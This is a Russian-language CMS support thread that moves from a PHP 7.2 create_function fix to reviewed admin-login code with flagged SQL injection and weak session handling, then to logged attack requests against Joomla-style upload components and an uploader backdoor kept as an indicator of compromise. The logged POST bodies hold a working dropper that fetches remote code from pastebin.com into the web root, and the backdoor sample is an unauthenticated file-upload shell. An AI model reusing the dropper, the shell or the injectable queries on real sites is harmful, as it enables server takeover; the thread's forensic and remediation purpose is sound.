по первому вопросу - понятно, буду искать.
По второму.
Заработало! УРААА!!
Спасибо.
По второму.
Заработало! УРААА!!
Спасибо.
nabster, проблема связана с новой версией PHP 7.2, функция create_function больше не будет поддерживаться. Эта функция объявлена устаревшей, начиная с PHP 7.2.0.
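Временным решением является переход на более раннюю версию PHP — 7.0 или 7.1. Это именно обходной путь: старые ветки PHP со временем перестают получать исправления безопасности, поэтому окончательное решение — замена вызовов create_function на анонимные функции.
В следующей версии CMS эта проблема будет решена.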
# Format admin variable
# Result: list of ':'-separated fields decoded from the admin session entry,
# or false when no admin session entry is set.
# NOTE(review): addslashes() is applied to the decoded string before it is
# split; if these fields are later placed into SQL, addslashes() is not a
# substitute for the database driver's own escaping or bound parameters.
# Confirm how $admin is used by callers.
if (isset($_SESSION[$conf['admin_c']])) {
    $admin = explode(
        ':',
        addslashes(base64_decode($_SESSION[$conf['admin_c']]))
    );
} else {
    $admin = false;
}
// Appears to be the bookkeeping done after a successful admin login: rebuild
// the admin session entry, delete rows of the _session table keyed by the
// client IP, stamp the admin record, write a login report and redirect.
// NOTE(review): $aid, $aname, $apwd, $aeditor, $name, $prefix, $admin_file,
// $conf and $db are defined outside this excerpt.
// NOTE(review): no session_regenerate_id() call is visible here; confirm the
// session ID is rotated at login elsewhere, otherwise a pre-login session ID
// stays valid for the authenticated admin.
unset($_SESSION[$conf['admin_c']]);
// base64 is an encoding, not encryption: whatever $apwd holds (presumably a
// password or its hash, to be confirmed) is stored in the session in a
// trivially reversible form.
$info = base64_encode($aid.":".$aname.":".$apwd.":".$aeditor);
$_SESSION[$conf['admin_c']] = $info;
$ip = getip();
// NOTE(review): both statements are built by string concatenation. If getip()
// can return a client-controlled header value, or $aid is not strictly
// numeric, this is an SQL injection point. Validate $ip with
// filter_var($ip, FILTER_VALIDATE_IP) and cast $aid to int before use, or
// switch to the escaping / bound-parameter facility of the $db layer.
$db->sql_query("DELETE FROM ".$prefix."_session WHERE uname = '".$ip."'");
$db->sql_query("UPDATE ".$prefix."_admins SET ip = '".$ip."', lastvisit = now() WHERE id = '".$aid."'");
login_report(1, 1, $name, "");
// NOTE(review): header() does not stop the script; unless an exit follows
// outside this excerpt, the code after the redirect still runs.
header("Location: ".$admin_file.".php");
Дата: 10.03.2019 23:16:38 --- POST: Array ( [--ae648f3cef84cec7a96b8786b6906ba7 Content-Disposition:_form-data;_name] => \"name\" vuln.php --ae648f3cef84cec7a96b8786b6906ba7 Content-Disposition: form-data; name=\"file\"; filename=\"index.jpg\" <title>Vuln!! patch it Now!</title> <?php function http_get($url){ $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); } $check = $_SERVER[\'DOCUMENT_ROOT\'] . \"/images/vuln.php\" ; $text = http_get(\'https://pastebin.com/raw/phAM8DFH\'); $open = fopen($check, \'w\'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check.\"</br>\"; }else echo \"not exits\"; echo \"done .\\n \" ; $check2 = $_SERVER[\'DOCUMENT_ROOT\'] . \"/vuln.htm\" ; $text2 = http_get(\'https://pastebin.com/raw/880ufaWF\'); $open2 = fopen($check2, \'w\'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2.\"</br>\"; }else echo \"not exits\"; echo \"done .\\n \" ; @unlink(__FILE__); ?> --ae648f3cef84cec7a96b8786b6906ba7-- ) GET: Array ( [option] => com_adsmanager [task] => upload [tmpl] => component ) ------------------ Дата: 10.03.2019 23:16:59 --- POST: Array ( [--a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition:_form-data;_name] => \"option\" com_fabrik --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"field_delimiter\" , --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"text_delimiter\" [quot; --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition:_form-data;_name] => \"controller\" import --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"tableid\" 0 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"overwrite\" 1 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"Itemid\" 0 
--a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"task\" doimport --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"name\" me.php --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"drop_data\" 1 --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"view\" import --a3d990fbfa374c2346d298493ee4d6c1 Content-Disposition: form-data; name=\"userfile\"; filename=\"files/vuln.txt\" Content-Type: multipart/form-data Vuln!! patch it Now! --a3d990fbfa374c2346d298493ee4d6c1-- )
<title>Vuln!! patch it Now!</title>
// Sample of an uploader backdoor as posted in the thread, kept as an
// indicator of compromise. The <title> marker above is the same string that
// appears in the logged POST bodies, which makes it a usable search string
// when sweeping the web root for dropped copies.
// The form has no authentication or access check of any kind: anyone who can
// request this file gets an upload form.
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
// On submit, the uploaded temp file is copied under the client-supplied file
// name (relative path, so next to the running script) with no extension,
// type or path check; the @ suppresses any warning that would otherwise
// reach the error log.
// Remediation on a host where this is found: remove the file, review files
// created in the same directory around the same time, deny PHP execution in
// upload and image directories, and patch the component the upload came in
// through.
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
    else { echo '<b>Not uploaded ! </b><br><br>'; }
}